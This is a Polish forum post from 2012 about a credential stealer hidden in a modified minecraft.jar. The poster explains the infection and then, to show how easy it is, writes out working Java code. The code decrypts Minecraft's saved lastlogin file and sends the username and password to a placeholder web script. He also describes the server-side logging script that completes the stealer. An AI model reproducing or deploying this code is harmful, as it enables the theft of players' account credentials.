(12-12-2012 22:18 )Golzeb Wrote: Najbardziej ciekawi to co się dzieje teraz z tymi kontami. Czy usuniecie tego minecraft.jar ,kończy temat z stealer'em na komputerze?
Usunięcie minecraft.jar usuwa również keyloggera, ponieważ kod osadza się tylko w minecraftcie. Nie trzeba też skanować komputera, tak jak radzą co niektórzy, bo keylogger nie ingeruje w system operacyjny, ani w żadne aplikacje poza minecraftem!
Zresztą dane zapisywały się na stronie
http://gg-luk.webuda.com/ , która już nie istnieje więc nie ma się czego bać, aż do momentu, gdy ktoś stworzy stronę o tym samym adresie ze skryptem zapisującym dane. (Właśnie podsunąłem komuś pomysł).
Do napisania tego keyloggera wcale nie trzeba być świetnym programistą, tym bardziej, że ten keylogger, czyli LastLogin Decryptor jest już od dawna w necie. Przykład takiego keyloggera:
http://pastebin.com/98K86Ygm
Ten skrypt, który jest w MineCash to jedynie tego przeróbka, aby login i hasło zapisywało się na stronie www, podejrzewam, że w pliku tekstowym - zapewne też znaleziony w necie. Przerobię to sam, żeby pokazać Wam jakie to łatwe, wystarczy podmienić kawałek kodu na to:
Code:
public static String DecryptMC() throws Exception {
String output = null;
Random random = new Random(43287234L);
byte[] salt = new byte[8];
random.nextBytes(salt);
PBEParameterSpec pbeParamSpec = new PBEParameterSpec(salt, 5);
SecretKey pbeKey = SecretKeyFactory.getInstance("PBEWithMD5AndDES")
.generateSecret(new PBEKeySpec("passwordfile".toCharArray()));
Cipher cipher = Cipher.getInstance("PBEWithMD5AndDES");
cipher.init(2, pbeKey, pbeParamSpec);
if (getWorkingDirectory().exists()) {
File lastLogin = new File(getWorkingDirectory(), "lastlogin");
DataInputStream dis = new DataInputStream(new CipherInputStream(
new FileInputStream(lastLogin), cipher));
output = "?user=" + dis.readUTF() + "&pass=" + dis.readUTF();
jdMethod_try("http://adres-strony.pl/skrypcik.php" + output);
}
}
i oto mamy gotowy keylogger. Jeszcze tylko skrypt na stronie, który nam to wszystko ładnie zapisze do pliku tekstowego. Po wywołaniu
http://adres-strony.pl/skrypcik.php?user...pass=haslo , doda nam linijkę z danymi do logowania.
Tutaj oryginał do porównania:
http://i.imgur.com/SVLLhh.png
Swoją drogą jeżeli TheNegatyw i MaciekTMPL mieli wgląd do kodu, to powinni znać adres strony, na której zapisują się dane. Wystarczyło tylko odgadnąć nazwę pliku .txt lub złamać ją jakimś słownikiem/bruteforcem (jeżeli jej nie znali) i mielibyśmy podgląd do tych danych.
(12-12-2012 22:16 )luke8828 Wrote: ekhm... kolejny "hakier" z gimnazjum? Daruj sobie takie teksty.
Hę?
